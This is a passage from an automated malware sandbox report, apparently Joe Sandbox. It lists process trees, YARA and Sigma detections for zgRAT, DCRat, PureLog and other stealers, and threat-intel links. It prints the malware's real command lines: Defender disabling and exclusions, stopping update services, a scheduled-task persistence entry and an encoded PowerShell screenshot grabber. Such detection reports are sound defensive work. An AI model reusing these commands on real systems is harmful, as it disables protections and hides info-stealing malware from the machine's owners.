AG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 8712 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 8752 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBF6.tmp" "c:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 8364 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8448 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8556 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8624 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 8832 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 8952 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 8872 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

Conhost.exe (PID: 8692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 9040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7964 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8468 cmdline: C:\Windows\Logs\SettingSync\cmd.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

cmd.exe (PID: 8532 cmdline: C:\Windows\Logs\SettingSync\cmd.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

cmd.exe (PID: 8616 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8696 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8736 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

Conhost.exe (PID: 9152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8816 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
HackBrowserData	Browser information stealer, written in Go.	No Attribution	https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign	https://malpedia.caad.fkie.fraunhofer.de/details/win.hackbrowserdata

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\3D Objects\tasklist.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\3D Objects\tasklist.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Logs\SettingSync\cmd.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Logs\SettingSync\cmd.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\main.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\ProgramData\main.exe	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
C:\ProgramData\main.exe	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
C:\ProgramData\main.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\ProgramData\main.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\ProgramData\main.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 21 entries

Memory Dumps

Source	Rule	Description	Author
0000000D.00000003.2086410223.0000000005E00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2273857665.0000025A8D351000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AmnesiaStealer	Yara detected Amnesia Stealer	Joe Security
00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AmnesiaStealer	Yara detected Amnesia Stealer	Joe Security
00000021.00000002.2411600731.000000001358B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AmnesiaStealer	Yara detected Amnesia Stealer	Joe Security
00000021.00000000.2123320987.0000000000C82000.00000002.00000001.01000000.00000027.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000003.2085959626.0000000005600000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: based.exe PID: 7556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: based.exe PID: 7556	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: based.exe PID: 7556	JoeSecurity_AmnesiaStealer	Yara detected Amnesia Stealer	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
12.3.s.exe.6b53711.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
12.3.s.exe.6b53711.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.svchost.exe.564e6ea.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
13.3.svchost.exe.564e6ea.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
33.0.ChainComServermonitor.exe.c80000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
33.0.ChainComServermonitor.exe.c80000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.svchost.exe.5e4e6ea.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
13.3.svchost.exe.5e4e6ea.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.svchost.exe.5e4e6ea.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
13.3.svchost.exe.5e4e6ea.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.3.svchost.exe.564e6ea.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
13.3.svchost.exe.564e6ea.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.main.exe.25a8b2505b8.2.raw.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
14.0.main.exe.25a8b2505b8.2.raw.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
14.0.main.exe.25a8b2505b8.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.0.main.exe.25a8b2505b8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.0.main.exe.25a8b2505b8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.0.main.exe.25a8b0e0000.0.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
14.0.main.exe.25a8b0e0000.0.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
14.0.main.exe.25a8b0e0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.0.main.exe.25a8b0e0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.0.main.exe.25a8b0e0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
14.0.main.exe.25a8b0eef04.1.raw.unpack	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
14.0.main.exe.25a8b0eef04.1.raw.unpack	JoeSecurity_MillenuimRAT	Yara detected Millenuim RAT	Joe Security
14.0.main.exe.25a8b0eef04.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.0.main.exe.25a8b0eef04.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.0.main.exe.25a8b0eef04.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 22 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 8616, ProcessName: cmd.exe

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe, ProcessId: 7636, TargetFilename: C:\ProgramData\svchost.exe

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe", ParentImage: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, ParentProcessId: 7412, ParentProcessName: ChainComServermonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\cmd.exe'" /rl HIGHEST /f, ProcessId: 2684, ProcessName: schtasks.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7556, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 7752, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7556, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7764, ProcessName: cmd.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 7696, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7744, ProcessName: wscript.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

